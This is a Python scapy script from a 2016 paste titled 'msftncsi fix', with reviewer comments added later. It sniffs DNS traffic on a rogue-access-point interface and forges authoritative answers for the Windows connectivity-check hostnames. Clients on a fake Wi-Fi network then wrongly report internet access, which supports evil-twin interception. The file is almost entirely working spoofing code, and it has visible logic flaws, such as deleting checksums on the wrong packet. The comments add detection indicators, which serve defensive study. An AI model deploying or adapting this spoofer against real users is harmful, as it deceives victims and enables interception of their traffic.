martinpo21

msftncsi fix

Jan 17th, 2016
# Script preamble: pull in scapy, report where the script lives, and announce
# the interface the rest of the script is hard-wired to.
from scapy.all import *
# `os` is never imported by name in this listing; presumably it arrives through
# the wildcard import above -- confirm before relying on it.
DIR=os.path.dirname(os.path.abspath(__file__))
print('Executed from '+DIR+'\n')
# 'at0' is hard-coded in every sendp()/sniff() call below; nothing checks that
# the interface exists.
print('Assuming interface at0')
  5.  
def FakeAccess2(pkt):
    """Sniff callback: answer DNS queries for msftncsi names with forged records.

    For a captured packet carrying a DNSQR layer, the query type (1 = A,
    28 = AAAA) and the query name are inspected. When the name contains
    'msftncsi', a response is built by swapping the Ethernet/IP/UDP source and
    destination of the query, copying the DNS id and question, setting qr=1
    and aa=1, and attaching one DNSRR with ttl=64 and a hard-coded rdata.
    The response is sent on 'at0' with sendp() and dumped with show2().
    Nothing is returned; all feedback is printed.

    Review notes (defensive reading):
      * The matched names are the hostnames of the Windows connectivity probe
        (NCSI), so a client receiving these answers reports connectivity based
        on the local responder rather than on real upstream reachability.
      * Indicators visible in the values below: authoritative (aa=1) answers
        with TTL 64 for msftncsi names, and www.msftncsi.com resolving to a
        private IPv4 address (10.0.0.254) or to ULA / link-local IPv6
        addresses. Comparing answers for these names against a trusted
        resolver exposes the mismatch.
      * Name matching is by substring ('dns', 'www', 'msftncsi'), so any query
        name containing those fragments is answered, not only the two exact
        hostnames.
      * NOTE(review): the paste lost its indentation; the nesting here is
        reconstructed from the print messages -- confirm against the original.
    """
    # The callback is handed one packet; index 0 is taken before use.
    pkt=pkt[0]
    if pkt.haslayer(DNSQR):
        print('Packet with DNSQR layer found.')
        # qtype 1: A (IPv4) queries.
        if pkt[DNS].qd.qtype == 1:
            print('DNSQR type appears type = A')
            if 'dns' in pkt[DNS].qd.qname and 'msftncsi' in pkt[DNS].qd.qname:
                # The answer must carry the genuine address (the author's "true value").
                #MUST RETURN TRUE VALUE!
                print('It appears captured DNS request requests dns.msftncsi.com')
                # Reply mirrors the query's addressing at every layer and reuses
                # its DNS id and question section.
                spoofed_pkt = Ether(dst=pkt[Ether].src, src=pkt[Ether].dst, type=pkt[Ether].type)/\
                    IP(dst=pkt[IP].src, src=pkt[IP].dst)/\
                    UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\
                    DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd,\
                    an=DNSRR(rrname=pkt[DNS].qd.qname, ttl=64, rdata='131.107.255.255'))
                # NOTE(review): these deletions act on the captured `pkt`, not on
                # `spoofed_pkt`; the same pattern repeats in every branch below.
                del pkt[IP].chksum
                del pkt[UDP].chksum

                sendp(spoofed_pkt,iface='at0')
                print('Spoofed response send:')
                spoofed_pkt.show2()

            if 'www' in pkt[DNS].qd.qname and 'msftncsi' in pkt[DNS].qd.qname:
                # Must point to the server that hosts ncsi.txt; do the same for IPv6.
                print('It appears captured DNS request requests www.msftncsi.com')
                spoofed_pkt = Ether(dst=pkt[Ether].src, src=pkt[Ether].dst, type=pkt[Ether].type)/\
                    IP(dst=pkt[IP].src, src=pkt[IP].dst)/\
                    UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\
                    DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd,\
                    # 10.0.0.254 must be the gateway configured for DHCP
                    an=DNSRR(rrname=pkt[DNS].qd.qname, ttl=64, rdata='10.0.0.254'))
                del pkt[IP].chksum
                del pkt[UDP].chksum

                sendp(spoofed_pkt,iface='at0')
                print('Spoofed response send:')
                spoofed_pkt.show2()

            # NOTE(review): attached to the 'www' test because of its message; as
            # attached, it also fires for the dns.* query answered above -- confirm.
            else:
                print('Wrong DNS.qd.qname :'+pkt[DNS].qd.qname)

        # qtype 28: AAAA (IPv6) queries.
        if pkt[DNS].qd.qtype == 28:
            print('DNSQR type appears type = AAAA')
            if 'dns' in pkt[DNS].qd.qname and 'msftncsi' in pkt[DNS].qd.qname:
                # The author marks this answer as one that must be the "true value".
                #MUST RETURN TRUE VALUE
                print('AAAA DNS request for dns.msftncsi.com found, loop works')
                # rdata here is an fd00::/8 (unique local) address.
                spoofed_pkt = Ether(dst=pkt[Ether].src, src=pkt[Ether].dst, type=pkt[Ether].type)/\
                    IP(dst=pkt[IP].src, src=pkt[IP].dst)/\
                    UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\
                    DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd,\
                    an=DNSRR(rrname=pkt[DNS].qd.qname, type=28, ttl=64, rdata='fd3e:4f5a:5b81::1'))

                del pkt[IP].chksum
                del pkt[UDP].chksum

                sendp(spoofed_pkt,iface='at0')
                print('Spoofed response send:')
                spoofed_pkt.show2()

            # Unlike the A branch, this test is "'dns' not in" rather than "'www' in",
            # so every other name containing 'msftncsi' lands here.
            if 'dns' not in pkt[DNS].qd.qname and 'msftncsi' in pkt[DNS].qd.qname:
                #MUST RETURN TRUE VALUE
                print('AAAA DNS request for www.msftncsi.com found, loop works')
                # rdata here is an fe80::/10 (link-local) address.
                spoofed_pkt = Ether(dst=pkt[Ether].src, src=pkt[Ether].dst, type=pkt[Ether].type)/\
                    IP(dst=pkt[IP].src, src=pkt[IP].dst)/\
                    UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\
                    DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd,\
                    an=DNSRR(rrname=pkt[DNS].qd.qname, type=28, ttl=64, rdata='fe80::ea94:f6ff:fe24:d147'))
                # RDATA is the IPv6 address of at0
                del pkt[IP].chksum
                del pkt[UDP].chksum

                sendp(spoofed_pkt,iface='at0')
                print('Spoofed response send:')
                spoofed_pkt.show2()

    else:
        print('Captured packet has no DNSQR')
  82.  
print('Sniffing...')
# The capture filter 'dst port 53' selects traffic addressed to port 53 on at0
# and hands each packet to FakeAccess2. store=0 keeps no packets in memory and
# count=0 sets no packet limit, so this call runs until it is interrupted.
sniff(filter='dst port 53',prn=FakeAccess2, store=0, count=0, iface='at0')